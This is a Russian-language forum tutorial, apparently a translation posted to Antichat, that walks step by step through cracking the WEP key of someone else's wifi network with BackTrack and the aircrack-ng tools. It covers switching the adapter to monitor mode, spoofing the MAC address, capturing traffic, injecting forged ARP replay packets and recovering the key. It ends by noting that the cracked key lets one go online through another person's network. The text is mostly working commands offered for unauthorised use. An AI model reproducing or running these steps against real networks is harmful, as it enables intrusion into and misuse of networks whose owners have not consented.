Для взлома WEP ключа нам понадобится:
- BactTrack 3
- подходящий wifi адаптер(
список).
- Точка доступа с WEP-шифрованием
- Базовое знание
терминов
.::Подготовка WIFI адаптера::.
Способ #1:
Набираем в консоли:
. В ответ будет что-то вроде:
Код:
bt ~ # iwconfig
lo no wireless extensions.
wifi0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"homenet" Nickname:""
Mode:Managed Frequency:2.437 GHz Access Point: 00:17:9A:26:8C:0E
Bit Rate:18 Mb/s Tx-Power:15 dBm Sensitivity=1/1
Retryff RTS thrff Fragment thrff
Encryption key:1234-5678-99 Security modepen
Power Managementff
Link Quality=18/70 Signal level=-78 dBm Noise level=-96 dBm
Rx invalid nwid:5601 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Как видим, карточка находится в управляемом режиме -
чтобы взломать сеть нужно перевести её в режим мониторинга. Для этого пишем:
Код:
wlanconfig ath1 create wlandev wifi0 wlanmode monitor
Всё, осталось сменить mac-адрес и можно переходить к следующему этапу, подставляя вместо [device] и [interface] ath1.
Способ #2:
Выдаст вам имя интерфейса беспроводного адаптера. Затем нужно остановить адаптер:
Код:
airmon-ng stop [device]
Затем:
Код:
ifconfig down [interface]
Теперь нужно поменять MAC адрес адаптера:
Код:
macchanger --mac 00:11:22:33:44:66 [device]
Настало время запустить адаптер в режиме мониторинга:
Код:
airmon-ng start [device]
.::Атакуем цель::.
Ищем сеть с WEP шифрованием командой:
Код:
airodump-ng [device]
Запишите MAC адрес сети(BSSID) ключ которой хотите найти , канал (CH) и имя (ESSID). Теперь нужно начинать собирать данные с точки доступа сети для атаки:
Код:
airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]

Эта команда выведет данные в файл network.out. Затем нужно скормить этот файл другой программе и золотой ключик наш

.
Откройте другую консоль (оставив эту работать). Теперь нужно сгенерить поддельные пакеты чтобы заставить точку доступа передавать больше данных необходимых для поиска ключа. Протестируйте точку доступа следующей командой:
Код:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
Если всё прошло успешно можно начинать генерировать множество пакетов чтобы взломать WEP ключ:
Код:
aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
Это заставит точку доступа передать множество пакетов которые мы будем использовать для взлома ключа. Переключитесь на airodump-ng работающий в другой консоли и вы увидите как число "data" пакетов растет со временем.
После того как количество пакетов достигнет 10000-20000 (чем больше пакетов тем быстрее будет найден ключ) можно запускать aircrack.
Если не получается получить от точки доступа пакеты вышеописанным способом попробуйте ввести:
Код:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
Теперь, когда вы собрали достаточное количество пакетов для взлома можно приступать собственно к взлому:
Код:
aircrack-ng -n 128 -b [bssid] [filename]-01.cap
-n указывает на то что ключ 128ми битный (может быть 64 битным).
Всё, ключ найден можно выходить в интернет с помощью чужой сети
Источник
Переведено и дополнено jawbreaker специально для Античат.ру!